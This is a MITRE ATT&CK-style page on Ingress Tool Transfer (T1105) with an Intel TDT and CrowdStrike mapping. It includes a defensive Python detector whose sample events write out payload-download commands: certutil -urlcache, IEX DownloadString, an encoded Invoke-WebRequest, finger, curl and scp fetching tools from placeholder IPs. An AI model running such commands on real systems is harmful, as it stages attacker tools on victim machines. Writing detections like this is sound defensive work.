T1105 Ingress Tool Transfer Mappings

Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp. Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer).

On Windows, adversaries may use various utilities to download tools, such as copy, finger, certutil, and PowerShell commands such as <code>IEX(New-Object Net.WebClient).downloadString()</code> and <code>Invoke-WebRequest</code>. On Linux and macOS systems, a variety of utilities also exist, such as curl, scp, sftp, tftp, rsync, finger, and wget.(Citation: t1105_lolbas)

Adversaries may also abuse installers and package managers, such as yum or winget, to download tools to victim hosts. Adversaries have also abused file application features, such as the Windows search-ms protocol handler, to deliver malicious files to victims through remote file searches invoked by User Execution (typically after interacting with Phishing lures).(Citation: T1105: Trellix_search-ms)
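As an added example (not Intel's, CrowdStrike's or MITRE's code), the Python script below turns the download indicators from the two paragraphs above into detection logic and runs it over constructed process-creation events: the Windows LOLBins and PowerShell cmdlets, the Linux/macOS copy utilities, yum/winget pointed at a URL or a local manifest, and a search-ms: URI whose crumb=location points at a remote share. The event shape (host name plus raw command line), the internal-host allowlist and the exact regex patterns are assumptions to be tuned against your own Sysmon Event ID 1, auditd EXECVE or EDR telemetry.

```python
"""Detect T1105-style ingress tool transfer in process-creation command lines.

Added example for this page; not Intel's, CrowdStrike's or MITRE's code.
The event shape, the allowlist and the patterns are assumptions.
"""
import base64
import re

# Internal hosts from which downloads are expected (constructed for the example).
ALLOWED_HOSTS = {"packages.example.internal", "wsus.example.internal"}

# (rule name, pattern, allowlist applies?). Case-insensitive: Windows binaries
# and PowerShell cmdlets are case-insensitive, and LOLBin abuse often mixes case.
RULES = [
    # certutil.exe -urlcache -split -f http://... (or the -verifyctl variant)
    ("certutil_download", r"\bcertutil(?:\.exe)?\b.*-(?:urlcache|verifyctl)\b", False),
    # IEX(New-Object Net.WebClient).DownloadString('http://...') / DownloadFile
    ("powershell_webclient", r"Net\.WebClient\b.*\bDownload(?:String|File|Data)\b", False),
    # Invoke-WebRequest / iwr with a URL
    ("powershell_iwr", r"\b(?:Invoke-WebRequest|iwr)\b.*https?://", True),
    # curl/wget with a URL (on Windows these are also PowerShell aliases of Invoke-WebRequest)
    ("curl_wget", r"\b(?:curl|wget)(?:\.exe)?\b.*https?://", True),
    # finger user@host: finger used to pull a payload from a remote finger daemon
    ("finger_download", r"\bfinger(?:\.exe)?\s+\S+@\S+", False),
    # scp/sftp/rsync from a remote source, or a tftp get
    ("remote_copy", r"\b(?:scp|sftp|rsync)\b.*\S+@\S+:|\btftp\b.*\bget\b", False),
    # yum/winget given a URL or a local manifest instead of a configured repository
    ("package_manager", r"\b(?:yum|winget)(?:\.exe)?\b.*(?:https?://|--manifest\b|\s-m\s)", True),
    # search-ms: URI whose crumb=location: points the Windows search handler at a remote share
    ("search_ms_handler", r"search-ms:.*crumb=location:", False),
]
COMPILED = [(name, re.compile(rx, re.I), allow) for name, rx, allow in RULES]

ENC_RE = re.compile(r"[-/](?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
HOST_RE = re.compile(r"""https?://([^/\s'"&]+)""", re.I)


def decode_encoded_command(cmdline):
    """Return the UTF-16LE payload of a PowerShell -EncodedCommand, or None."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def url_hosts(text):
    """Hosts of every http(s) URL in text, lower-cased and without port."""
    return {h.split(":")[0].lower() for h in HOST_RE.findall(text)}


def classify_command(cmdline, allowed_hosts=ALLOWED_HOSTS):
    """Names of the rules the command line (or its decoded payload) matches."""
    texts = [cmdline]
    decoded = decode_encoded_command(cmdline)
    if decoded:
        texts.append(decoded)
    hosts = set().union(*(url_hosts(t) for t in texts))
    only_internal = bool(hosts) and hosts <= allowed_hosts
    hits = []
    for name, rx, allowlist_applies in COMPILED:
        if allowlist_applies and only_internal:
            continue  # plain fetch from an approved internal host: expected traffic
        if any(rx.search(t) for t in texts):
            hits.append(name)
    return hits


def scan_events(events):
    """Return one finding per event that matched at least one rule."""
    findings = []
    for host, cmdline in events:
        rules = classify_command(cmdline)
        if rules:
            findings.append({"host": host, "rules": rules, "cmdline": cmdline})
    return findings


# Constructed sample events (host, command line); addresses are documentation ranges.
ENCODED = base64.b64encode(
    "Invoke-WebRequest http://198.51.100.7/b.exe -OutFile C:\\Windows\\Temp\\b.exe".encode("utf-16-le")
).decode()
SAMPLE_EVENTS = [
    ("WS01", "certutil.exe -urlcache -split -f http://198.51.100.7/update.exe C:\\Users\\Public\\update.exe"),
    ("WS01", "powershell.exe -nop -w hidden -c \"IEX(New-Object Net.WebClient).DownloadString('http://198.51.100.7/a.ps1')\""),
    ("WS02", f"powershell.exe -EncodedCommand {ENCODED}"),
    ("SRV02", "finger.exe root@198.51.100.7 | more"),
    ("LNX03", "curl -s https://198.51.100.7/agent -o /tmp/agent"),
    ("LNX03", "curl -s https://packages.example.internal/repo/list"),
    ("LNX03", "scp deploy@203.0.113.9:/opt/tools/nc /tmp/nc"),
    ("WS04", 'explorer.exe "search-ms:query=invoice&crumb=location:\\\\198.51.100.7\\share&DisplayName=Downloads"'),
    ("WS05", "winget install --manifest C:\\Users\\Public\\m.yaml"),
    ("WS05", "notepad.exe C:\\Users\\Public\\readme.txt"),
]

if __name__ == "__main__":
    for f in scan_events(SAMPLE_EVENTS):
        print(f"{f['host']}: {', '.join(f['rules'])}  <- {f['cmdline'][:70]}")
```

Two design points matter more than the individual regexes. First, PowerShell -EncodedCommand payloads are decoded (base64 of UTF-16LE) and scanned alongside the raw command line, otherwise the most common evasion of string matching slips through. Second, the allowlist only suppresses the generic fetch rules (curl, wget, Invoke-WebRequest, package managers) when every URL in the command points at an approved internal host; certutil, finger, search-ms and remote copy utilities are flagged regardless of destination, because a download through those tools is rarely legitimate administration.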

Files can also be transferred using various Web Services as well as native or otherwise present tools on the victim system.(Citation: PTSecurity Cobalt Dec 2016) In some cases, adversaries may be able to leverage services that sync between a web-based and an on-premises client, such as Dropbox or OneDrive, to transfer files onto victim systems. For example, by compromising a cloud account and logging into the service's web portal, an adversary may be able to trigger an automatic syncing process that transfers the file onto the victim's machine.(Citation: Dropbox Malware Sync)


Mappings

Capability ID | Capability Description            | Mapping Type    | ATT&CK ID | ATT&CK Name           | Notes
intel-tdt     | Intel Threat Detection Technology | CrowdStrike AMS | T1105     | Ingress Tool Transfer |
Comments

Intel Threat Detection Technology (TDT) and CrowdStrike Falcon Accelerated Memory Scanning (CAMS): Defending Against Ingress Tool Transfer

Intel Threat Detection Technology (TDT), combined with CrowdStrike Falcon Accelerated Memory Scanning (CAMS), strengthens defenses by enabling faster, real-time detection of Ingress Tool Transfer. The integration extends CrowdStrike Falcon's ability to detect and mitigate threats earlier in the kill chain while minimizing system performance impact.

Ingress Tool Transfer is the adversary moving tools or scripts from an external system into a compromised environment, typically to establish a foothold, escalate privileges, or stage the next phase of an attack. The tools can arrive over the command and control channel, over alternate protocols, through file-sharing services, or via network shares. In a larger intrusion this transfer is the phase that introduces the payloads on which further exploitation depends.

Intel TDT contributes by providing low-level, real-time telemetry on program execution, memory access, and control flow. That telemetry helps security teams spot abnormal behavior such as unexpected file writes, network connections, or tool downloads that may indicate an ingress tool transfer, and makes the arrival of malicious files, scripts, or other tools easier to identify before they are used to extend the intrusion. Because this mapping is to accelerated memory scanning, the detection opportunity it accelerates is the transferred payload once it is resident in memory on the endpoint; it complements, rather than replaces, network- and process-level monitoring of the transfer itself.